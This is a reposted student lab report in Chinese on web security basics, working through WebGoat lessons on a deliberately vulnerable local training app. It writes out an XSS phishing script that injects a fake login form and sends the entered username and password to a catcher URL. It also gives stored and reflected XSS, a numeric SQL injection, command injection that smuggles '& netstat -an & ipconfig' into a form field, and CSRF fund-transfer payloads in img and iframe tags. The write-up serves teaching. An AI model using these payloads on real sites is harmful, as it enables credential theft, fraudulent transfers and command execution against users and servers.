Exp9 Web安全基础实践 20164318 毛瀚逸

最新推荐文章于 2024-09-14 10:24:09 发布
最新推荐文章于 2024-09-14 10:24:09 发布
阅读量166 收藏
点赞数
文章标签: web安全 java ui
原文链接:http://www.cnblogs.com/breakingdoge/p/10925622.html
版权

1.实验后回答问题

(1)SQL注入攻击原理,如何防御

原理:通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

防御:对输入的数据进行限制,非法字符不能输入

(2)XSS攻击的原理,如何防御

原理:它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本

防御:对输入数据进行过滤,

(3)CSRF攻击原理,如何防御

原理:利用用户在某站点的cookie,另一站点对用户发送攻击代码,使得另一站点以用户的登录信息登入站点。

防御:在cookie中包含该用户的特定信息,登陆时使用验证码等等

 

2.1实验步骤

1、webgoat准备

将webgoat存入kali后,在相应的目录的终端输入java -jar webgoat-container-7.0.1-war-exec.jar

然后在浏览器中输入http://localhost:8080/WebGoat,用下方默认的用户登录

2.Phishing with XSS

在搜索框输入

在搜索框里输入XSS攻击代码

  
</form>

  <script>

function hack(){

XSSImage=new Image;

XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";

alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);

}

  </script>

<form name="phish">

<br>

<br>

<HR>

  <H2>This feature requires account login:</H2>

<br>

  <br>Enter Username:<br>

  <input type="text" name="user">

  <br>Enter Password:<br>

  <input type="password" name = "pass">

<br>

  <input type="submit" name="login" value="login" οnclick="hack()">

</form>

<br>

<br>

<HR>
 

 


3、stored XSS attacks

在发送的帖子中插入jsp代码,当帖子被别人浏览时,会被浏览器解析

在帖子中输入<script>alert("20164318 did this");</script> 

看见提示框,发现成功

4、reflected XSS Attack

在“Enter your three digit access code:”中输入 <script>alert("20164318 did this")</script>

点击updatecart

5、numeric sQl injection

代码是当station=101时查看columbia的天气,我们将“value=101”变为“value=101 or 2=2”,等式恒成立,我们就可以查看所有地方的天气了。

 

6、common injection

右键复选框,选择inspect Element,在option后加上"& netstat -an & ipconfig"

在页面中选择该类型,然后点击view,则会出现结果

7、CSRF

我们可以以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一次CSRF攻击。

查看自己电脑的Screen和menu的值:

帖子内容为<img src="http://localhost:8080/WebGoat/attack?Screen=276&menu=900&transferFunds=666"/>

提交后可以看到内容

8、CSRF 冒名转账

利用CSRF进行冒名操作转账,不过这次包括了转账请求和确认转账成功请求,需要传递两个参数给服务器

message框输入

<iframe src="attack?Screen=src值&menu=menu值&transferFunds=转账数额">

</iframe>

<iframe src="attack?Screen=src值&menu=menu值&transferFunds=CONFIRM">

</iframe>

提交后点击,我们可以看到结果

 

3.实验问题

之前打开webgoat发现侧边菜单只有几个选项,都是和实验无关的内容,经同学指点后发现java设置有问题

4.实验心得

这次实验几乎就是切实的去攻击了,除了这些攻击的站点都做得极为不严谨之外。而且在攻击时,我们不仅需要对各种攻击方式熟悉,更要对很多种语言熟悉,如果你不懂语言,各种工具可没有成熟的ui来方便你的操作。

转载于:https://www.cnblogs.com/breakingdoge/p/10925622.html

baochenlu2165
关注
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
网络安全中的POC、EXP、Payload、ShellCode
日拱一卒,功不唐捐
09-18 8811
POC:概念证明,即概念验证(英语:Proof of concept,简称POC)是对某些想法的一个较短而不完整的实现,以证明其可行性,示范其原理,其目的是为了验证一些概念或理论。在计算机安全术语中,概念验证经常被用来作为0day、exploit的别名。EXP:利用(英语:Exploit,简称EXP)一般指可利用系统漏洞进行攻击的动作程序。Payload:中文 ’ 有效载荷 ',指成功exploit之后,攻击代码释放的具有攻击能力的能够实现攻击者目的的代码。
Web安全之PoC、Exp和Payload的关系
jiet07的博客
10-26 4315
POC和EXP POC = Proof of Concept中文意思是“观点证明”。这个短语并非仅仅在漏洞报告中使用,甲方在项目招标过程中也常常要求乙方提供POC,即证明你的方案或者产品能达到声称的功能或性能,漏洞报告中的POC则是一段说明或者一个攻击的样例,使得读者能够确认这个漏洞是真实存在的。 EXP = Exploit的中文意思是“漏洞利用”。意思是一段对漏洞如何利用的详细说明或者一个演示的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利用的方法。 POC,是用来验证漏洞是否存在的一段代码。 EXP
web安全】——报错注入
Demo不是emo的博客
01-07 1万+
SQL注入之报错注入
白帽子讲Web安全——世界观安全
独活
11-14 6246
一、web安全简史 1、不想拿“root”的黑客不是好黑客 2、在黑客的世界里,有的黑客,精通计算机技术,能自己挖掘漏洞,并编写exp;而有的黑客只懂得编译别人的代码,自己没有动手能力,这种黑客被称为脚本小子。在现实世界里,真正造成破坏的往往是脚本小子。 3、中国黑客的发展分为三个阶段:启蒙阶段、黄金阶段、黑暗阶段。黑暗阶段从几年前开始一直延续到今天,也许还将继续下去。 4、黑客技术:早期以系统软件居多,攻击系统软件往往能直接获取root权限;web1.0时代:服务器端端脚本安全问题;we...
信息安全入门——web安全介绍
小白一枚多多关注的博客
11-15 5352
通过上一篇文章使我们得知了信息安全与网络安全之间的区别以及分别做什么的,今天我将给大家介绍一下信息安全中较为庞大的一个分支中的分支——web安全web安全顾名思义,就是web服务的安全web服务通常由服务器、中间件、插件、内容构成,而攻击者就是通过某种特殊的手段已达到拿下web服务器为目的。 web安全每年都会由国际组织“开放式web应用程序安全项目(owasp)”来定义每年危害排前10的漏洞,但个人觉得每年这个榜基本上变化都不大,接下来我们就来了解一下该组织每年所定义的危害排名前十的漏洞(简称O
2022年零基础自学网络安全/Web安全,看这一篇就够了
欢迎来到技术宅的博客
03-09 4503
随手写写关于web安全的内容,希望对初次遇到web安全问题的同学提供帮助。
2021Web安全面试题大全(附答案详解)看完稳了
m0_59991869的博客
10-13 1万+
人人都有一个进大厂的梦想,而进大厂的门槛也可想而知,所以这里整理了一份安全大厂的面试大全,看完文章如果对你有帮助的话希望能够点赞+收藏+关注!感谢! 本篇文章对于学习Web安全的朋友来说应该是目前最全面的面试题合集了,后续也会陆续更新其他大厂的面试题目和知识点。另外我还整理了许多关于Web安全的学习资料+工具包等等,需要的点击Web安全学习 一、渗透测试面试题,包含大量渗透技巧 1.拿到一个待检测的站,你觉得应该先做什么? a、信息收集 1、获取域名的whois信息,获取注册者邮箱姓名电话等,丢
Web安全工程师(学习规划)
煮酒闲谈
08-04 5920
WEB安全工程师简介: web安全工程师是信息安全领域的一个职位,它负责对公司网站、业务系统进行安全评估测试;对公司各类系统进行安全加固;对公司安全事件进行响应,清理后门,根据日志分析攻击途径;安全技术研究,包括安全防范技术,黑客技术等;跟踪最新漏洞信息,进行业务产品的安全检查。 职位描述:——————————————— 1. 对公司网站、业务系统进行安全评估测试(黑盒、白盒测试); 2
Web安全工程师成长路线
sanMu_blog的博客
06-24 8761
Web安全工程师 职位描述: 对公司网站、业务系统进行安全评估测试(黑盒、白盒测试);对公司各类系统进行安全加固;对公司安全事件进行响应,清理后门,根据日志分析攻击途径;安全技术研究,包括安全防范技术,黑客技术等;跟踪最新漏洞信息,进行业务产品的安全检查。 职位要求: 熟悉主流的Web安全技术,...
Web安全渗透测试基本流程
xueshenlaila的博客
03-15 2837
对于web应用的渗透测试,大致可分为三个阶段:信息收集、漏洞发现以及漏洞利用。在实践过程中需要进一步明细测试的流程,以下通过9个阶段来描述渗透测试的整个流程: 1.明确目标 1)确定范围:测试的范围,如:IP、域名、内外网、整站or部分模块 2)确定规则:能渗透到什么程度(发现漏洞为止or继续利用漏洞)、时间限制、能否修改上传、能否提权… 目标系统介绍、重点保护对象及特性。 是否允许数据破坏? 是否允许阻断业务正常运行? 测试之前是否应当知会相关部门接口人? 接入方式?外网和内网? 测试是发现问题就算.
Python从0到100(四十八):前后端分离架构实践使用Django构建安全的Session验证系统
热门推荐
Hello大家好,我是Dream,如果帮得到你,那我深感荣幸!交流学习、商务合作:https://bbs.csdn.net/topics/614347534
07-29 3万+
在Python Web开发中,合理使用Session和Token机制可以有效地保护我们的应用免受未授权访问。通过上述示例和最佳实践,我们可以构建一个既安全又高效的Web应用。
网络安全(黑客技术)2024年三个月自学手册
最新发布
2401_85026116的博客
09-14 2297
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全(黑客)——自学2024
2401_84466325的博客
09-09 1882
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1951
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
【网络安全】-文件上传漏洞实战-upload-labs(0~16)
weixin_65311462的博客
09-09 1453
准备:一句话木马:
【网络安全】漏洞挖掘:文件上传实现Webshell
等风来
09-10 400
接着,我上传webshell.php文件,文件内容为payload,拦截请求包,将文件名修改为jpg,但回显错误,这说明服务器验证了文件的内容。
【网络安全】-文件上传漏洞
weixin_65311462的博客
09-10 896
文件上传漏洞指hacker能利用网站能让用户上传文件的功能,在上传过程中上传木马,直接连接或配合文件包含漏洞获取webshell,从而导致用户权限丢失,隐私泄露。成功getshell后hacker还可以长期控制受影响的网站或服务器,进行持续性的攻击和破坏,甚至会将受控制的服务器作为攻击其他目标的跳板,利用该服务器的资源和网络带宽发起更广泛的网络攻击。
网络安全 L1 Introduction to Security
weixin_74400487的博客
09-12 678
Then he/she may be able to decrypt passwords offline using brute force (thereby bypassing methods to prevent on-line password cracking).暴力破解是一种尝试所有可能的密码组合,直到找到正确密码的方法。由于这种破解尝试是在攻击者的系统上进行的,而不是直接针对目标系统,因此它可以绕过目标系统上可能存在的防止在线密码破解的措施,如账户锁定策略或登录尝试限制。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值